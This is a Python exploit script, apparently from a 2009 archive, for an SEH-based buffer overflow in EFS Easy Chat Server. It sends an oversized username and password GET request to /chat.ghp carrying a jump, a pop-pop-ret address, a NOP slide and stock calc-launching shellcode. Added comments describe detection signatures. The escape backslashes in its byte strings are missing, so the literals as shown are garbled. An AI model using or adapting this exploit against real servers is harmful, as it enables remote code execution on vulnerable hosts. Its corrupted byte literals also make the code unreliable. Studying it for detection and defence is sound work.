# Title : EFS Easy Chat Server Authentication Request BOF Exploit (SEH)
# Published : 2009-03-03
# Author : His0k4
#!/usr/bin/python
#[*] Bug : EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (SEH)
#[*] Refer : http://www.milw0rm.com/exploits/4289
#[*] Tested on : Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings : All friends & muslims HaCkErs (DZ)
import struct
import socket
# Proof-of-concept request described in the header above: a single
# unauthenticated GET to the chat server's /chat.ghp endpoint whose
# username and password query parameters are several hundred bytes long.
# From a defender's view the request itself is the signature: oversized
# credential parameters on /chat.ghp, no prior session, and a client that
# disconnects right after one send.
# NOTE(review): string literals, the hard-coded target and the port are
# kept byte-identical to the page; nothing below is adjusted.
buf = "x41"*216   # filler up to the SEH record, per the author's layout
buf += "xEBx06xAExFA" #jmp+6   # short jump placed in the SEH "next" slot (author's comment)
buf += "xB6xB2x01x10" #universal pop pop ret   # handler address; "universal" is the author's claim, not verified here
buf += "x90"*19   # NOP slide ahead of the payload
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# The payload is the generator's stock calc launcher (CMD=calc above), so a
# successful run is observable as calc.exe started as a child of the chat
# server process — a useful detection rule for this and similar PoCs.
buf+=(
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xa4"
"x0dx2bxbax83xebxfcxe2xf4x58xe5x6fxbaxa4x0dxa0xff"
"x98x86x57xbfxdcx0cxc4x31xebx15xa0xe5x84x0cxc0xf3"
"x2fx39xa0xbbx4ax3cxebx23x08x89xebxcexa3xccxe1xb7"
"xa5xcfxc0x4ex9fx59x0fxbexd1xe8xa0xe5x80x0cxc0xdc"
"x2fx01x60x31xfbx11x2ax51x2fx11xa0xbbx4fx84x77x9e"
"xa0xcex1ax7axc0x86x6bx8ax21xcdx53xb6x2fx4dx27x31"
"xd4x11x86x31xccx05xc0xb3x2fx8dx9bxbaxa4x0dxa0xd2"
"x98x52x1ax4cxc4x5bxa2x42x27xcdx50xeaxccxfdxa1xbe"
"xfbx65xb3x44x2ex03x7cx45x43x6ex4axd6xc7x0dx2bxba")
# Both parameters carry the same buffer; the page does not say which of the
# two is the one actually overrun, so that is left undocumented here.
head = "GET /chat.ghp?username="+buf+"&password="+buf+"&room=1 HTTP/1.1rn"
head += "Host: 127.0.0.1rn"   # no body and no Content-Length: the whole trigger lives in the query string
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',80))   # target fixed to localhost:80; a refused connection raises, nothing is caught
s.send(head + "rnrn")   # str send is Python 2 behaviour; Python 3 requires bytes and raises TypeError
s.close()   # only reached on the success path — the socket is not closed if connect()/send() raise